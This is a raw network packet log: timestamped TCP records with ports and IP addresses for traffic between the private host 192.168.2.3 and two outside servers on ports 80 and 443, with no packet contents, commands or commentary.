Aug 23, 2022 03:42:56.213020086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213042021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213083982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213119030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213136911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213480949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213510990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213536978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213551044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213567972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213582993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213645935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213675022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213721991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213727951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213762045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213814974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213874102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213901997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213934898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213951111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.213963032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.213999987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214021921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214049101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214065075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214113951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214121103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214142084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214157104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214179039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214215040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214247942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214307070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214318037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214350939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214380026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214389086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214402914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214411020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214433908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214438915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214467049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214468002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214497089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214500904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214524031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214529037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214553118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214562893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214581013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214585066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214603901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214622974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214633942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214636087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214659929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214662075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214684010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214690924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214710951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214720011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214742899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214749098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214777946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214777946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214788914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214801073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214827061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214828014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214852095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214874983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214876890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214905977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214920998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214926004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214951992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.214955091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214962959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.214979887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215004921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215025902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215029001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215049028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215075970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215075970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215106964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215110064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215122938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215136051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215157986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215184927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.215188026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.215241909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.537226915 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.537296057 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.537436962 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.549642086 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.549695015 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.633580923 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.633749962 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.645374060 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.645400047 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.650239944 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.650262117 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.680605888 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.680747986 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:56.680778980 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.680814028 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.725796938 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:56.725835085 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:57.048960924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.083300114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173111916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173177958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173208952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173228025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173276901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173309088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173326015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173367977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173389912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173445940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173466921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173500061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173546076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173583984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173604965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173640013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173682928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173744917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173760891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173823118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.173852921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173883915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.173935890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.205319881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205415010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205462933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.205482960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.205533981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205590963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205651999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.205677986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205765963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205821991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205845118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.205895901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205955029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.205969095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.206018925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.206075907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.206681967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.206757069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.206773043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.206811905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.207680941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.207741022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.207794905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.207820892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.207863092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.207875967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.207911015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.207963943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208008051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.208038092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.208080053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208137989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208189964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208214045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.208242893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.208288908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208342075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208388090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.208414078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.208504915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.237668037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237720966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237760067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237787962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237840891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237858057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.237885952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.237904072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.237941980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.237982035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238010883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238044024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238065004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238101959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238132954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238174915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238202095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238256931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238292933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.238347054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238364935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.238938093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.239056110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240245104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240291119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240330935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240372896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240394115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240436077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240454912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240495920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240536928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240556955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240576029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240612030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240652084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240693092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240712881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240752935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240793943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240812063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240843058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.240868092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240907907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240948915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.240967989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.241008043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241054058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241065979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.241106033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241152048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241163015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.241203070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241245985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241266012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.241306067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241343975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241360903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.241401911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.241452932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243649960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.243705034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.243733883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243762970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243791103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.243832111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.243871927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.243895054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243902922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243941069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.243967056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.244005919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.244024038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.244085073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270498991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270586014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270631075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270653009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270700932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270745993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270782948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270801067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270826101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270867109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270893097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270914078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.270946026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.270987034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271022081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271042109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271068096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271100998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271133900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271156073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271182060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271229029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271256924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271265984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271312952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271342039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271383047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271451950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271514893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271578074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.271934986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.271980047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272047043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272059917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272154093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272192955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272239923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272264957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272298098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272315025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272341967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272382021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272398949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272443056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272485018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272526979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272543907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272567034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272595882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272615910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272656918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272696018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272722960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272752047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272774935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272814989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272840977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272864103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.272892952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272933006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272970915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.272995949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.273030996 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.273056030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273094893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273135900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273169994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.273195982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.273236036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273291111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273339033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.273375988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.273405075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275156975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275199890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275284052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275326967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275377035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275414944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275444031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275475979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.275496006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.275537014 CEST	80	49774	45.95.11.158	192.168.2.3
